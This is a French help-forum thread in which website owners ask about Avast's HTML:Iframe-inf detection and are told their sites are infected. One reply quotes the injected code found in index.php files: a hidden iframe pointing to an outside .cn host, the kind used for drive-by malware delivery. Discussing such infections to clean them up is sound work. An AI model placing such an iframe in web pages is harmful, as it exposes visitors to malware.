Se connecter / S'enregistrer
Votre question

HTML:Iframe-inf

Tags :
  • Mise à jour
  • Sécurité
Dernière réponse : dans Sécurité et virus
17 Avril 2009 01:23:27

je possède avast professionnelle 4.8 avec une mise à jour réulière mais je n'arive plus depuis longtemps miantenant à me connecter sur l'un de mes sites favoris. Avast détecte le virus HTML:Iframe-inf sans aucune action. aidez moi svp a accéder de nouveau à mon site

Autres pages sur : html iframe inf

a b 8 Sécurité
17 Avril 2009 11:58:11

Bonjour,

Bah c'est pas un problème du site ?
m
0
l
18 Avril 2009 11:57:43

C'est quoi le problème alors! situe moi
m
0
l
Contenus similaires
a b 8 Sécurité
18 Avril 2009 12:49:58

Le site possède l'infection donc on ne peut rien faire de notre côté mis à part éviter d'y aller.
m
0
l
2 Mai 2009 00:21:48

Angeldark a dit :
Le site possède l'infection donc on ne peut rien faire de notre côté mis à part éviter d'y aller.

je te remercie pour ton assistance mais je deviens de + en + inquiet pour la simple raison que ce site est le mien. j'ai veritablement besoin qu'on m'aide à trouver une solution afin d'utiliser à nouvo mon site.
svp
m
0
l
a b 8 Sécurité
3 Mai 2009 15:40:53

Si tu remplaces Avast! par AntiVir, tu as le même prob ?
m
0
l
3 Mai 2009 20:13:13

je ne lè pa encor essayé mais en plus de vouloir accéder à mon site je voudrais bien également me débarasser de cette infection qui m'inquiète véritablement
m
0
l
a b 8 Sécurité
4 Mai 2009 13:49:26

Si l'alerte n'apparait qu'en allant sur le site, elle n'est pas sur ton pc. Merci de faire un effort sur l'orthographe :) 
m
0
l
4 Mai 2009 17:47:01

escuse moi pour l'orthographe. Je sais depuis le départ na pas être infecté sur ma machine. cependant mon problème c'est comment parvenir à désinfecté mon site qui visiblement semble être infecté.
m
0
l
a b 8 Sécurité
5 Mai 2009 12:44:38

Il faut revoir ton code, on peut rien dans cette section.
m
0
l
19 Mai 2009 09:32:13

Même Problème, nous avons un site web et toutes les pages index.php sont vérolés par ce virus: HTML:Iframe-inf.
C'est a dire que des bouts de code apparaissent dans nos fichiers du type : (attention ne pas cliquer)

Citation :
<iframe src="http://findbigbrother.cn:8080/ts/in.cgi?pepsi6" width=2 height=4 style="visibility: hidden"></iframe>

Nous avons Avast qui avait détecté le virus HTML:Iframe-inf qui depuis en était mis en quarantaine! est ce vraiment sûr?

Merci d'avance

m
0
l
Tom's guide dans le monde
  • Allemagne
  • Italie
  • Irlande
  • Royaume Uni
  • Etats Unis
Suivre Tom's Guide
Inscrivez-vous à la Newsletter